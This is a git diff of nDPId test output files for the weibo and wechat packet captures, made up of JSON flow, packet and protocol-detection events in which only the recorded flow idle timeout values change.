+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1672,"packets-processed":1672,"total-skipped-flows":0,"total-l4-data-len":561272,"total-not-detected-flows":0,"total-guessed-flows":31,"total-detected-flows":80,"total-detection-updates":66,"total-updates":4,"current-active-flows":0,"total-active-flows":110,"total-idle-flows":110,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":676,"global_ts_msec":1492171291761} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1672/1672 diff --git a/test/results/weibo.pcap.out b/test/results/weibo.pcap.out index 4432cf05b..bac9566cd 100644 --- a/test/results/weibo.pcap.out +++ b/test/results/weibo.pcap.out @@ -4,12 +4,12 @@ 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1463089067804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1463089067804,"pkt":"eJKcD6iOkDVu60UQCABFAAClAABAADMR2u3YOtIOwKgBaQG7wNEAkSEpAAl3y2T5ujTCSSEU5zJMPfXh7u\/a3oWq2yhhK1m4ny+qR4W2lfILr6Ils4h\/iqKUCkI0zipqePuQ8qDP3gfa2UEwOgxjQY6zEBJhdLLCAKezbAF+wpbNcZnrqI9Vp3iRS5CpzEuDxhuTRv5J009cEtkCA6nVS0D6WXhVs+S9\/EHIHeXl6YD1cbA="} 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1463089067804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1463089067804,"pkt":"eJKcD6iOkDVu60UQCABFAAFTAABAADMR2j\/YOtIOwKgBaQG7wNEBPzHaAAoUu93Ovdfsj+VZ99cgMeSVKfCKokSNRuOMv1PGF2DIkukcXrUmGkv\/ArCiq\/KK23NXKqXH3z8FxKfa8OQtN5x73GaADweitAmqYsU072yu9KsRUtnFIEIB5Y5LqWVX6vqXepSvfYCEhodq+tUiz0aSzdffkeHhLztt20iOOpChbjrtXhyjh2xOYPCWGl\/75gN\/zEEb2R9h09zfr5IUCExPcV8JWIdoh2fXU4mq9qytwCU0GOdjsWy12v2HhTBnSYnXaFz8kW\/ToyswW6z6hT26xiqWB5RJW9cvGUU8G6jKCXTHHR5WczEJ7NLt9QErBQKutf8Nh4rVBXW1avPgj1A0tNYSKXAcYt1eYGsw4tjOzS7DHafUDgikSZ+H9BNuGGXb1gwh45909vW3665ubMpNt9lmWoI="} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1463089067805,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1463089067805,"pkt":"kDVu60UQeJKcD6iOCABFAABHtklAAEARGALAqAFp2DrSDsDRAbsAM7beDDzb+3ozZeMBCkxEEj6TblVeBP78aEspYfuydCS19UAd5UCVpxpshuwHMA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089069330,"flow_last_seen":1463089069330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089069330,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1463089069330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069330,"pkt":"kDVu60UQeJKcD6iOCABFAAA0vWJAAEAGDMfAqAFp2DrWTuRwAbsLWGhZZbJo+oAQAO2GIAAAAQEICgBBBg58MNQL"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1463089069374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069374,"pkt":"eJKcD6iOkDVu60UQCABFAAA04pUAADMGNJTYOtZOwKgBaQG75HBlsmj6C1hoWoAQAV4BuwAAAQEICnwxg\/kAQNoT"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070086,"flow_last_seen":1463089070086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089070086,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463089070086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070086,"pkt":"kDVu60UQeJKcD6iOCABFAAA0hxpAAEAGQw\/AqAFp2DrWTuRxAbtN5WEdhI1WjIAQAO065AAAAQEICgBBBst8MNbL"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463089070131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070131,"pkt":"eJKcD6iOkDVu60UQCABFAAA0MLYAADMG5nPYOtZOwKgBaQG75HGEjVaMTeVhHoAQAV62dAAAAQEICnwxhr4AQNrV"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089069330,"flow_last_seen":1463089069330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089069330,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1463089069330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069330,"pkt":"kDVu60UQeJKcD6iOCABFAAA0vWJAAEAGDMfAqAFp2DrWTuRwAbsLWGhZZbJo+oAQAO2GIAAAAQEICgBBBg58MNQL"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1463089069374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089069374,"pkt":"eJKcD6iOkDVu60UQCABFAAA04pUAADMGNJTYOtZOwKgBaQG75HBlsmj6C1hoWoAQAV4BuwAAAQEICnwxg\/kAQNoT"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070086,"flow_last_seen":1463089070086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089070086,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463089070086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070086,"pkt":"kDVu60UQeJKcD6iOCABFAAA0hxpAAEAGQw\/AqAFp2DrWTuRxAbtN5WEdhI1WjIAQAO065AAAAQEICgBBBst8MNbL"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463089070131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089070131,"pkt":"eJKcD6iOkDVu60UQCABFAAA0MLYAADMG5nPYOtZOwKgBaQG75HGEjVaMTeVhHoAQAV62dAAAAQEICnwxhr4AQNrV"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070755,"flow_last_seen":1463089070755,"flow_idle_time":180000,"flow_min_l4_payload_len":364,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1463089070755,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00927{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1463089070755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":406,"pkt_l4_len":372,"thread_ts_msec":1463089070755,"pkt":"kDVu60UQeJKcD6iOCABFAAGIMGNAAEARm9LAqAFp2DrS49GYAbsBdI1JDLva88\/LUhUgJJB9mYAGceDgbWxM0LRsm4JNDbKc2scH8met9koeqL6\/vSPRbc8Azif26oxDIgzQBvKXwSWqmW75DLc+Tze8HLmFOLbpW1dfDh+CmYIDg83ozCrqzZhIa7c9c87+9DDGInSDf9f\/tl92yy8f1zwi5ofEkbjAvQ14GM0UCN2FUqQXDuqOrr4+0mp4RLoTXyk0KmRSNOp96LQHThISJcaekcpsRADkvdkvWyfHzVzaPjpEHmDVGxlff0Lyt7xPlz4I3iJqFNYIv6S5IeCVHrZ+OTOUiQ654SUxByYukSwW968bKOypceOi6Z9YrJBsh8fbzBOlaaCscjkwvRlnA94hXGNPW\/f1uJBnwscXyRa1XQX3ylsU7+3wwIt8bcdzaqKvgasSUBwcjaznmyXm4EMkY0SocvpvlP+Y\/Tyw+d3\/Jt6j83TjDTmoWxIattwqrgJYlX1vanz3uVHuuTPizgrn3v70Ig=="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1463089070755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1463089070755,"pkt":"kDVu60UQeJKcD6iOCABFAAA5MGRAAEARnSDAqAFp2DrS49GYAbsAJVKhDLva88\/LUhUgJfyz0FFMX+goev2cGp67zKdIwHY="} @@ -19,63 +19,63 @@ 00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070757,"flow_last_seen":1463089070757,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1463089070757,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1463089070841,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1463089070841,"pkt":"eJKcD6iOkDVu60UQCABFAABHAABAAEARtuvAqAEBwKgBaQA11swAM884smyBgAABAAEAAAAABXdlaWJvA2NvbQAAAQABwAwAAQABAAAAJAAEcoZQog=="} 00773{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weibo.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"114.134.80.162"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA80EtAAEAG5TbAqAFpcoZQoubwAFDrBNfMAAAAAKACchCe2wAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071008,"flow_last_seen":1463089071008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071008,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463089071008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089071008,"pkt":"kDVu60UQeJKcD6iOCABFAAA8ct5AAEAGQqTAqAFpcoZQoubxAFC2vHVvAAAAAKACchA1VgAAAgQFtAQCCAoAQQexAAAAAAEDAwc="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071046,"flow_last_seen":1463089071046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089071046,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463089071046,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071046,"pkt":"kDVu60UQeJKcD6iOCABFAAA0aeJAAEAGY8fAqAFp2DrSzolSAbv6shUXRZgnfoAQAcBJAQAAAQEICgBBB7tvXD+b"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071094,"pkt":"eJKcD6iOkDVu60UQCABFAAA0QjAAADYG1XnYOtLOwKgBaQG7iVJFmCd++rIVGIAQCVwVnQAAAQEICm9c76IAQIN7"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1463089071195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071195,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BcYAACkGBsVyhlCiwKgBaQBQ5u8JOZF4vUUCE4ASOQhvgQAAAgQFqAEBBAIBAwMH"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1463089071195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071195,"pkt":"kDVu60UQeJKcD6iOCABFAAAoBZZAAEAGsADAqAFpcoZQoubvAFC9RQITCTmReVAQAOXoagAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089070841,"flow_last_seen":1463089071196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1463089071196,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"weibo.com","url":"weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071198,"pkt":"eJKcD6iOkDVu60UQCABFAAA0IcQAACoG6cZyhlCiwKgBaQBQ5vAZ6VqE6wTXzYASOQiSSgAAAgQFqAEBBAIBAwMH"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071198,"pkt":"kDVu60UQeJKcD6iOCABFAAAo0ExAAEAG5UnAqAFpcoZQoubwAFDrBNfNGelahVAQAOULNAAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089071348,"pkt":"eJKcD6iOkDVu60UQCABFAAA0BccAACoGBcRyhlCiwKgBaQBQ5vFPiVnutrx1cIASOQjz5AAAAgQFqAEBBAIBAwMH"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089071348,"pkt":"kDVu60UQeJKcD6iOCABFAAAoct9AAEAGQrfAqAFpcoZQoubxAFC2vHVwT4lZ71AQAOVszgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA8BZVAAEAGr+3AqAFpcoZQoubvAFC9RQISAAAAAKACchCiVgAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089070841,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089070841,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463089070841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089070841,"pkt":"kDVu60UQeJKcD6iOCABFAAA80EtAAEAG5TbAqAFpcoZQoubwAFDrBNfMAAAAAKACchCe2wAAAgQFtAQCCAoAQQeHAAAAAAEDAwc="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089071008,"flow_last_seen":1463089071008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089071008,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 